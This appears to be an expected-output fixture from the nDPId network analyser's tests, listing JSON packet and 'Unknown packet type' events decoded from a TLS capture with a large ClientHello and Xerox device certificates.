00389{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAADQAAEAAPQZjHQrOQfkKzoMSAbvlIcEFrEzOLtYBgBI5CGLyAAACBAW0AQEEAgEDAwc="} 00375{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":74,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":74,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAADQAAEAAPQZjHQrOQfkKzoMSAbvlIcEFrEzOLtYBgBI5CGLyAAACBAW0AQEEAgEDAwc="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846744} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846744}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAACjDSkAAPwad3grOgxIKzkH55SEBu84u1gHBBaxNUBAchMBIAAAAAAAAAAA="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAACjDSkAAPwad3grOgxIKzkH55SEBu84u1gHBBaxNUBAchMBIAAAAAAAAAAA="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846771} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846771}
01453{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":866,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":866,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAA0zDS0AAPwaauQrOgxIKzkH55SEBu84u1gHBBaxNUBgchP+6AAAWAwMDHwEAAxsDA7MBwRcglDZhL6NP+OfprwtR2a2+EN2bALWxOtNOmOORAAK8AA8AxQCVwJHADcCrwH8AEQDDACXAhwCPAKvABMCZwEoAO8wU5BQAwcCbACbAaQCzALHAJACUAEMARcBlAD3AosBXAI3AEwAZABcAaeQbAGTACswV5BkApQApwD7AW8B0zBPAXAASwBfAhQAnABMAnQCZAAsAiQABACLAlcCBwAvAOcBmwCPkEwCHAG3AGMBjABrkEAA1wDAAKMB+wCAAOMCfACwAMcAvALUALsBfwG\/ALsCYAAMAmwACAC\/AP8AcAJfAKgC3AD7AgwCgwAcAhsAtwFIAkgAGwCEANABqADnAZAAMAGAAgMAdwIrAdsARwKUAhABBAAgArsAywHzARcCcALvATgA2ALwAYgC4AKjAfQAUAJYAkcBgwKfAVcBw5BYAQgBhwAXAPcBZwAkAaAC5wB8AZ8CeAGbAcsA2AKYAhQCwwFEAgsCQwDzkHsCgwBQAjgCT5B\/AqgCpAIHAqMBHAAQAEMADwFjApMAxAEvAFeQVAIgAvgCawAIArMA1wGcAScA4AAkALQC9wGHkHcBPAGvAOwBHABsAp8BQwJLAG8BaAEDAegAgAIMAo8BewEbAFsASAJDAEACfAK3AYsBtwIDAe8CIACsAnAANwCUAMMCWwCzAhMBsAAXATcBqwKHAGQCY5BfAVAAWAB7AKMB5wIbAmgBjwFbAjwBMwEzAncAzACPAa8ABAKrAdwCkAKHAeADEwCLAjsA6AD8AbABKwAgAMsCpADrAQAAHAMLANMCmwHHAGsCLAEYAPAAzAL\/AK8AnAKLAS8BTACTADsBIAETAHsBEAB\/kGMCNALoAtgC05BrABsBCwEnAQwCK5BIASAAKAIsANwAVAMAAnsCCwIzAJsAPAGUAjMCJwKPAcwAqwG7AXcBoACHAlwCywDfkHMApwJMAr8B1wEEAAAAOwAzAlOQRABgA\/wEAADYACgAGAAQAFwAYAA0AIAAeAgEDAQQBBQEGAQICAwIEAgUCBgICAwMDBAMFAwYDAAsABAMAAQI="} 01439{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":866,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":866,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABsKp3tUhAgQAAXYEAAQIIAEUAA0zDS0AAPwaauQrOgxIKzkH55SEBu84u1gHBBaxNUBgchP+6AAAWAwMDHwEAAxsDA7MBwRcglDZhL6NP+OfprwtR2a2+EN2bALWxOtNOmOORAAK8AA8AxQCVwJHADcCrwH8AEQDDACXAhwCPAKvABMCZwEoAO8wU5BQAwcCbACbAaQCzALHAJACUAEMARcBlAD3AosBXAI3AEwAZABcAaeQbAGTACswV5BkApQApwD7AW8B0zBPAXAASwBfAhQAnABMAnQCZAAsAiQABACLAlcCBwAvAOcBmwCPkEwCHAG3AGMBjABrkEAA1wDAAKMB+wCAAOMCfACwAMcAvALUALsBfwG\/ALsCYAAMAmwACAC\/AP8AcAJfAKgC3AD7AgwCgwAcAhsAtwFIAkgAGwCEANABqADnAZAAMAGAAgMAdwIrAdsARwKUAhABBAAgArsAywHzARcCcALvATgA2ALwAYgC4AKjAfQAUAJYAkcBgwKfAVcBw5BYAQgBhwAXAPcBZwAkAaAC5wB8AZ8CeAGbAcsA2AKYAhQCwwFEAgsCQwDzkHsCgwBQAjgCT5B\/AqgCpAIHAqMBHAAQAEMADwFjApMAxAEvAFeQVAIgAvgCawAIArMA1wGcAScA4AAkALQC9wGHkHcBPAGvAOwBHABsAp8BQwJLAG8BaAEDAegAgAIMAo8BewEbAFsASAJDAEACfAK3AYsBtwIDAe8CIACsAnAANwCUAMMCWwCzAhMBsAAXATcBqwKHAGQCY5BfAVAAWAB7AKMB5wIbAmgBjwFbAjwBMwEzAncAzACPAa8ABAKrAdwCkAKHAeADEwCLAjsA6AD8AbABKwAgAMsCpADrAQAAHAMLANMCmwHHAGsCLAEYAPAAzAL\/AK8AnAKLAS8BTACTADsBIAETAHsBEAB\/kGMCNALoAtgC05BrABsBCwEnAQwCK5BIASAAKAIsANwAVAMAAnsCCwIzAJsAPAGUAjMCJwKPAcwAqwG7AXcBoACHAlwCywDfkHMApwJMAr8B1wEEAAAAOwAzAlOQRABgA\/wEAADYACgAGAAQAFwAYAA0AIAAeAgEDAQQBBQEGAQICAwIEAgUCBgICAwMDBAMFAwYDAAsABAMAAQI="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":4,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846773} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846773}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAACjoA0AAPQZ7JQrOQfkKzoMSAbvlIcEFrE3OLtklUBAAf9kpAAAAAAAAAAA="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":68,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":68,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAACjoA0AAPQZ7JQrOQfkKzoMSAbvlIcEFrE3OLtklUBAAf9kpAAAAAAAAAAA="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846773} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846773}
02334{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1522,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":1522,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUABdzoBEAAPQZ1cArOQfkKzoMSAbvlIcEFrE3OLtklUBAAf4KWAAAWAwMAMQIAAC0DA6eY8O1X3X3mQxpK5jBthKXbggXTdMEwSebU\/C3eGyaMAABFAAAF\/wEAAQAWAwMKsAsACqwACqkABa0wggWpMIIEkaADAgECAgRcADaSMA0GCSqGSIb3DQEBCwUAMIGwMQswCQYDVQQGEwJVUzERMA8GA1UECAwITmV3IFlvcmsxEjAQBgNVBAcMCVJvY2hlc3RlcjEaMBgGA1UECgwRWGVyb3ggQ29ycG9yYXRpb24xKzApBgNVBAsMIkdlbmVyaWMgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxMTAvBgNVBAMMKFhlcm94IEdlbmVyaWMgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTgxMTI5MTg1NzIyWhcNMjMxMTI5MTg1NzIyWjCBsjELMAkGA1UEBhMCVVMxFDASBgNVBAgMC0Nvbm5lY3RpY3V0MRAwDgYDVQQHDAdOb3J3YWxrMRowGAYDVQQKDBFYZXJveCBDb3Jwb3JhdGlvbjEmMCQGA1UECwwdR2xvYmFsIFByb2R1Y3QgRGVsaXZlcnkgR3JvdXAxGDAWBgNVBAMMD1hSWDlDOTM0RTk0OUZFRjEdMBsGCSqGSIb3DQEJARYOdXNlckB4ZXJveC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCzOO4XBzGAsvXAUZCvKlNS0ZkTg4CPeXJP+nJVRYA6XFVgcCBzykrSHCu0Y5U7SEcAp8qNsaTFqksYnK\/LydYXDbB8hopOYrLt9CybGPHIgOHFLqHcR7AQGMPPsqNseCPbVxC9MxESLkuuP6C+psPTMgU3We8QQepVTiTwRPkjbRt2ckXJmlv9RVwBZJw5H9Kj67ioINRaF7pzZa8+WXvRU7yezlug0Rzfp5ecju0QBU4VVZe3xUzfdZWz\/fJSPmAHkTaC2YSiwkocYvBT4zICg1P1PoEDtqIqZeii6N1m0v6iOX9IqiHmzg62Idlf1UVl5TDJNOjjpoWiNOg8STnRAgMBAAGjggHFMIIBwTAJBgNVHRMEAjAAMA4GA1UdDwEB\/wQEAwID6DARBglghkgBhvhCAQEEBAMCBeAwJwYJYIZIAYb4QgENBBoWGFhlcm94IERldmljZSBDZXJ0aWZpY2F0ZTBFBgNVHSUEPjA8BggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMEBggrBgEFBQcDBQYIKwYBBQUHAwYGCCsGAQUFBwMHMIHgBgNVHREEgdgwgdWkgbUwgbIxCzAJBgNVBAYTAlVTMRQwEgYDVQQIDAtDb25uZWN0aWN1dDEQMA4GA1UEBwwHTm9yd2FsazEaMBgGA1UECgwRWGVyb3ggQ29ycG9yYXRpb24xJjAkBgNVBAsMHUdsb2JhbCBQcm9kdWN0IERlbGl2ZXJ5IEdyb3VwMRgwFgYDVQQDDA9YUlg5QzkzNEU5NDlGRUYxHTAbBgkqhkiG9w0BCQEWDnVzZXJAeGVyb3guY29tghVYUlg5QzkzNEU5NDlGRUYubG9jYWyHBArOQfkwHQYDVR0OBBYEFMmJGzBJIOsjLFdZLeXCDp3CSY16MB8GA1UdIwQYMBaAFA5YSZ0ji1KMbT2VVkZ5iGGFcfkbMA0GCSqGSIb3DQEBCwUAA4IBAQB80KwxdBQ2CUwzB3yhxrGfnJ\/+Rn876RYYjG9vMongwqLQxzoMeih5ZYXUzZli4hz+h1LK1v\/Ege\/lnGMJWs5DzyRepcrJfNJyE84fIaiM7ydc4mgf4KSu\/x7gt5qX9YMDRXEHpueX87MCCsZd9AQjFk4qZRY0WhjFRvbThA5GqkFpCqA0X55jQpF7OHcvidnEDSSGJOscxoaULh4nHZ+rmU8zNBk1ygIMcR6kn+pbP+1LRFxtmg9WILz8X+C22fbQoA=="} 02320{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1522,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":1522,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUABdzoBEAAPQZ1cArOQfkKzoMSAbvlIcEFrE3OLtklUBAAf4KWAAAWAwMAMQIAAC0DA6eY8O1X3X3mQxpK5jBthKXbggXTdMEwSebU\/C3eGyaMAABFAAAF\/wEAAQAWAwMKsAsACqwACqkABa0wggWpMIIEkaADAgECAgRcADaSMA0GCSqGSIb3DQEBCwUAMIGwMQswCQYDVQQGEwJVUzERMA8GA1UECAwITmV3IFlvcmsxEjAQBgNVBAcMCVJvY2hlc3RlcjEaMBgGA1UECgwRWGVyb3ggQ29ycG9yYXRpb24xKzApBgNVBAsMIkdlbmVyaWMgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxMTAvBgNVBAMMKFhlcm94IEdlbmVyaWMgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTgxMTI5MTg1NzIyWhcNMjMxMTI5MTg1NzIyWjCBsjELMAkGA1UEBhMCVVMxFDASBgNVBAgMC0Nvbm5lY3RpY3V0MRAwDgYDVQQHDAdOb3J3YWxrMRowGAYDVQQKDBFYZXJveCBDb3Jwb3JhdGlvbjEmMCQGA1UECwwdR2xvYmFsIFByb2R1Y3QgRGVsaXZlcnkgR3JvdXAxGDAWBgNVBAMMD1hSWDlDOTM0RTk0OUZFRjEdMBsGCSqGSIb3DQEJARYOdXNlckB4ZXJveC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCzOO4XBzGAsvXAUZCvKlNS0ZkTg4CPeXJP+nJVRYA6XFVgcCBzykrSHCu0Y5U7SEcAp8qNsaTFqksYnK\/LydYXDbB8hopOYrLt9CybGPHIgOHFLqHcR7AQGMPPsqNseCPbVxC9MxESLkuuP6C+psPTMgU3We8QQepVTiTwRPkjbRt2ckXJmlv9RVwBZJw5H9Kj67ioINRaF7pzZa8+WXvRU7yezlug0Rzfp5ecju0QBU4VVZe3xUzfdZWz\/fJSPmAHkTaC2YSiwkocYvBT4zICg1P1PoEDtqIqZeii6N1m0v6iOX9IqiHmzg62Idlf1UVl5TDJNOjjpoWiNOg8STnRAgMBAAGjggHFMIIBwTAJBgNVHRMEAjAAMA4GA1UdDwEB\/wQEAwID6DARBglghkgBhvhCAQEEBAMCBeAwJwYJYIZIAYb4QgENBBoWGFhlcm94IERldmljZSBDZXJ0aWZpY2F0ZTBFBgNVHSUEPjA8BggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMEBggrBgEFBQcDBQYIKwYBBQUHAwYGCCsGAQUFBwMHMIHgBgNVHREEgdgwgdWkgbUwgbIxCzAJBgNVBAYTAlVTMRQwEgYDVQQIDAtDb25uZWN0aWN1dDEQMA4GA1UEBwwHTm9yd2FsazEaMBgGA1UECgwRWGVyb3ggQ29ycG9yYXRpb24xJjAkBgNVBAsMHUdsb2JhbCBQcm9kdWN0IERlbGl2ZXJ5IEdyb3VwMRgwFgYDVQQDDA9YUlg5QzkzNEU5NDlGRUYxHTAbBgkqhkiG9w0BCQEWDnVzZXJAeGVyb3guY29tghVYUlg5QzkzNEU5NDlGRUYubG9jYWyHBArOQfkwHQYDVR0OBBYEFMmJGzBJIOsjLFdZLeXCDp3CSY16MB8GA1UdIwQYMBaAFA5YSZ0ji1KMbT2VVkZ5iGGFcfkbMA0GCSqGSIb3DQEBCwUAA4IBAQB80KwxdBQ2CUwzB3yhxrGfnJ\/+Rn876RYYjG9vMongwqLQxzoMeih5ZYXUzZli4hz+h1LK1v\/Ege\/lnGMJWs5DzyRepcrJfNJyE84fIaiM7ydc4mgf4KSu\/x7gt5qX9YMDRXEHpueX87MCCsZd9AQjFk4qZRY0WhjFRvbThA5GqkFpCqA0X55jQpF7OHcvidnEDSSGJOscxoaULh4nHZ+rmU8zNBk1ygIMcR6kn+pbP+1LRFxtmg9WILz8X+C22fbQoA=="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":6,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846909} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":6,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846909}
02337{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":7,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1522,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":1522,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUABdzoBUAAPQZ1bwrOQfkKzoMSAbvlIcEFsgHOLtklUBAAf385AAALxoVe5\/5I\/GDx\/TXFQSvGZzZlkxxeY6r7JfvE1MO5kSqJIylcqtI3CgZidU7wxPplCb4PCKG\/MIidVTuxRwAE9jCCBPIwggPaoAMCAQICAQIwDQYJKoZIhvcNAQELBQAwgbAxCzAJBgNVBAYTAlVTMREwDwYDVQQIDAhOZXcgWW9yazESMBAGA1UEBwwJUm9jaGVzdGVyMRowGAYDVQQKDBFYZXJveCBDb3Jwb3JhdGlvbjErMCkGA1UECwwiR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTExMC8GA1UEAwwoWGVyb3ggR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTAgFw0xNTExMTIyMzUyNDBaGA8yMDI0MDQxNTIzNTk1OVowgbAxCzAJBgNVBAYTAlVTMREwDwYDVQQIDAhOZXcgWW9yazESMBAGA1UEBwwJUm9jaGVzdGVyMRowGAYDVQQKDBFYZXJveCBDb3Jwb3JhdGlvbjErMCkGA1UECwwiR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTExMC8GA1UEAwwoWGVyb3ggR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKt8bDMRhnfwJSIitgDFLpGuBprC4tMhmkGTeBAp8D9tAJoRmr+CQlMBB0pRzAN3w\/GP1z48MoOiOUPMjA0yAQqbt15H+uMuVo4oC0Zl\/CXAy2wCEdlvlnWBzsZx+on5aArVYHxCe638JGA7+LhPXCM+346VJRtjkNd9d11824SziT\/ygbTCBgVVvBQfxWREr4m3OIDTRnRYod7st+aMcTs4X8iIywZyrHXM2eAOP\/xODdJcpVCW5vx+mk6jJj73WVq\/XPDe0cXAxYE8sy6qGWTHvht48XMNGGpEESimKhn1YJiWKYBNbsKu1nbfEzD687rWbkrNMW0Sc\/MsgRTOAUcCAwEAAaOCAREwggENMB0GA1UdDgQWBBQOWEmdI4tSjG09lVZGeYhhhXH5GzCB3QYDVR0jBIHVMIHSgBQOWEmdI4tSjG09lVZGeYhhhXH5G6GBtqSBszCBsDELMAkGA1UEBhMCVVMxETAPBgNVBAgMCE5ldyBZb3JrMRIwEAYDVQQHDAlSb2NoZXN0ZXIxGjAYBgNVBAoMEVhlcm94IENvcnBvcmF0aW9uMSswKQYDVQQLDCJHZW5lcmljIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MTEwLwYDVQQDDChYZXJveCBHZW5lcmljIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5ggECMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAFzBoKpnLrmCU34LZVg1dmsGoHKRK8ICHad1WmoTf8tebjslNeQND+QJaTFr3pX+k42\/n0u56QcCuzaiFTXHUV9FwQBXBhJRCC1Gw8JtD3KZTYD9IBg4q76pwMV3oYIc7yX0hApuPlis99BtrQ9uAJVJiqY61RayEgUpVpo+CewQOmF5JFd9ewI7lhRF\/1idFtJtNnVamFRvVESZUI+qwjibTBflOWhLITGcO7Wiztv2SGGWMWBXMEA04kzRXHZBKwPrVxAN4fFTRFJV+ONyDQcmGWoouPJiF2sv+h4P7L2o+Dy0iFjKIFY9A5Cg99pRDDKSRMAvCINP6g5IjDcjgJUWAwMDDwwAAwsBAMNj2BphFRDNLN7J8e1RH+Su2MMVc1DB3hpn71wBz6BtmNgWp4+Y2p9CQiEHz4mR1ejIQBfdfvytF2PniPCskclZXrLgsDC4r0hI53ROCdv4P1SZUaFs3carINdEGB1bHf8sdFbtL9NWvyl+LVW75HzWLA=="} 02323{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1522,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":1522,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUABdzoBUAAPQZ1bwrOQfkKzoMSAbvlIcEFsgHOLtklUBAAf385AAALxoVe5\/5I\/GDx\/TXFQSvGZzZlkxxeY6r7JfvE1MO5kSqJIylcqtI3CgZidU7wxPplCb4PCKG\/MIidVTuxRwAE9jCCBPIwggPaoAMCAQICAQIwDQYJKoZIhvcNAQELBQAwgbAxCzAJBgNVBAYTAlVTMREwDwYDVQQIDAhOZXcgWW9yazESMBAGA1UEBwwJUm9jaGVzdGVyMRowGAYDVQQKDBFYZXJveCBDb3Jwb3JhdGlvbjErMCkGA1UECwwiR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTExMC8GA1UEAwwoWGVyb3ggR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTAgFw0xNTExMTIyMzUyNDBaGA8yMDI0MDQxNTIzNTk1OVowgbAxCzAJBgNVBAYTAlVTMREwDwYDVQQIDAhOZXcgWW9yazESMBAGA1UEBwwJUm9jaGVzdGVyMRowGAYDVQQKDBFYZXJveCBDb3Jwb3JhdGlvbjErMCkGA1UECwwiR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTExMC8GA1UEAwwoWGVyb3ggR2VuZXJpYyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKt8bDMRhnfwJSIitgDFLpGuBprC4tMhmkGTeBAp8D9tAJoRmr+CQlMBB0pRzAN3w\/GP1z48MoOiOUPMjA0yAQqbt15H+uMuVo4oC0Zl\/CXAy2wCEdlvlnWBzsZx+on5aArVYHxCe638JGA7+LhPXCM+346VJRtjkNd9d11824SziT\/ygbTCBgVVvBQfxWREr4m3OIDTRnRYod7st+aMcTs4X8iIywZyrHXM2eAOP\/xODdJcpVCW5vx+mk6jJj73WVq\/XPDe0cXAxYE8sy6qGWTHvht48XMNGGpEESimKhn1YJiWKYBNbsKu1nbfEzD687rWbkrNMW0Sc\/MsgRTOAUcCAwEAAaOCAREwggENMB0GA1UdDgQWBBQOWEmdI4tSjG09lVZGeYhhhXH5GzCB3QYDVR0jBIHVMIHSgBQOWEmdI4tSjG09lVZGeYhhhXH5G6GBtqSBszCBsDELMAkGA1UEBhMCVVMxETAPBgNVBAgMCE5ldyBZb3JrMRIwEAYDVQQHDAlSb2NoZXN0ZXIxGjAYBgNVBAoMEVhlcm94IENvcnBvcmF0aW9uMSswKQYDVQQLDCJHZW5lcmljIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MTEwLwYDVQQDDChYZXJveCBHZW5lcmljIFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5ggECMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAFzBoKpnLrmCU34LZVg1dmsGoHKRK8ICHad1WmoTf8tebjslNeQND+QJaTFr3pX+k42\/n0u56QcCuzaiFTXHUV9FwQBXBhJRCC1Gw8JtD3KZTYD9IBg4q76pwMV3oYIc7yX0hApuPlis99BtrQ9uAJVJiqY61RayEgUpVpo+CewQOmF5JFd9ewI7lhRF\/1idFtJtNnVamFRvVESZUI+qwjibTBflOWhLITGcO7Wiztv2SGGWMWBXMEA04kzRXHZBKwPrVxAN4fFTRFJV+ONyDQcmGWoouPJiF2sv+h4P7L2o+Dy0iFjKIFY9A5Cg99pRDDKSRMAvCINP6g5IjDcjgJUWAwMDDwwAAwsBAMNj2BphFRDNLN7J8e1RH+Su2MMVc1DB3hpn71wBz6BtmNgWp4+Y2p9CQiEHz4mR1ejIQBfdfvytF2PniPCskclZXrLgsDC4r0hI53ROCdv4P1SZUaFs3carINdEGB1bHf8sdFbtL9NWvyl+LVW75HzWLA=="}
00216{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":7,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846909} 00202{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":7,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1557818846909}
01290{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"ja3_lots_of_cipher_suites.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":734,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":734,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAAAABAAd9VAeAgQAAXYEAAQIIAEUAAsjoBkAAPQZ4ggrOQfkKzoMSAbvlIcEFt7XOLtklUBgAf3btAAArP3r0rVe0Aym6JLwpOw\/ARwhTpY9aS7jceyqxacIXzRspfll0u1\/NkXDZNHalNI0jifA02VmOaSzhsGzJ03fuqKyyLCUPurWOZCj\/m+yOkMFwArOo4uIOxsENzfQIgKhMCW3YH1KAEc\/D52lgcc5dEHoPQCigIQjo2dWhtfY\/oG4sKNF1rHdnRmXJwxczAAECAQCB0DPstOMfM5F8X5MwgsDlsx2xgwVyLIjRqp9YCi1KiPDkTsRRNZ9DD6t\/ryiWXZAQh9BkHB6TFnEabzzd3ZV133DGDkbN8ivrZ\/z57itpt2v72s73UcOj834+OvBHQFis\/1RjFZ7mfCgZRE7PIBkRRL\/Gn9PLQP0KlGyVBXaYBJTPMozKF3QO3V\/4LEH3gpTFO8WY5zmgwf\/CrWjV7llloR3tiNBaPGJTsW2xi2J6BP1sZieM89wnWuVbN6GqAOFNenvYif3wSlXllxAZenbfAoFQylIORWBw38yjKf3qIiHxBJU4ZxexUo\/O3\/t3hKHDSjcp4a7NNUxFPMsCxeC4AgEBAC3kckI79wHr9Jdk4qPrAuTCIIeE\/qBxvLET0Ua\/Ah37Jo0oIdRWbuCV7ge6meATSbHe7FqMhYpMG23Q4uSTupEwX5lZxUqx\/xIwzx\/AfDOL16722QUiKA21ChDMHjmqP5t7YWazRTsOuyLB6n0u9314zm7LNLRLxx5EGml4HiX5zxmVQR\/KEVEeOD+pMCY0IxlT35RaHC0aLunpBP\/ttxpaC85IzJ+shFeD9zYmMngnHXqhjgcuDFtGQMpQpLUFpMeo2O0rVIMdLlN1ZFuVyYVT661Vjz7ZgC7FvbaJEi5940Vlycu+kXQRVfxPb6IwVbYoX8euxN9GS2WsUJxqmpEWAwMABA4AAAA="} 